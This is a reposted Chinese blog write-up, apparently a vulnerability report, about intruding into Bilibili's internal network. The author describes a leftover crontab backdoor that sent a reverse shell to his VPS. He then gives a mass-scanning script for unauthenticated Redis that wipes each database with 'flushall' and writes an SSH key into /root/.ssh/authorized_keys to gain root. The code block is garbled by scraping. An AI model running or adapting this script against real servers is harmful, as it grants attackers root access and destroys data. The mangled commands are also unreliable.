默认 redis 安装存在漏洞，可以直接获取 root 权限

转载地址：http://www.2cto.com/Article/201512/454117.html我假装闲来无事地在 VPS 上监听了某一个端口，然后突然反弹过来一个 shell。嗯，假装是不知道哪年哪月的一个 crontab 后门再次把我带入了 Bilibili 的内网。内网存在许多 redis 未授权访问，为什么不问问神奇海螺呢？详细说明：我假装闲来

TerryWater

4886人浏览 · 2016-01-28 12:08:41

TerryWater · 2016-01-28 12:08:41 发布

转载地址：http://www.2cto.com/Article/201512/454117.html

我假装闲来无事地在 VPS 上监听了某一个端口，然后突然反弹过来一个 shell。嗯，假装是不知道哪年哪月的一个 crontab 后门再次把我带入了 Bilibili 的内网。
内网存在许多 redis 未授权访问，为什么不问问神奇海螺呢？

详细说明：

我假装闲来无事地在 VPS 上监听了某一个端口，然后突然反弹过来一个 shell。

估计是之前留的 crontab 后门，不过这不重要。

前几天爆出了 redis 未授权访问然后写 authorized_keys 来强行拿权限，总之原理是如此如此，可以看
http://www.2cto.com/Article/201512/454361.html 来了解具体利用。

在 B 站内网扫描了一下 6379 端口，然后写了一个 sh 脚本来自动化执行。

code 区域

1

2

3

4

5

 
         <code>redis-cli  -h $ 
         1 
          flushall 
        
         cat foo.txt | redis-cli -h $ 
         1 
          -x set  
         1 
        
         redis-cli -h $ 
         1 
          config set dir /root/.ssh 
        
         redis-cli -h $ 
         1 
          config set dbfilename authorized_keys 
        
         redis-cli -h $ 
         1 
          save</code>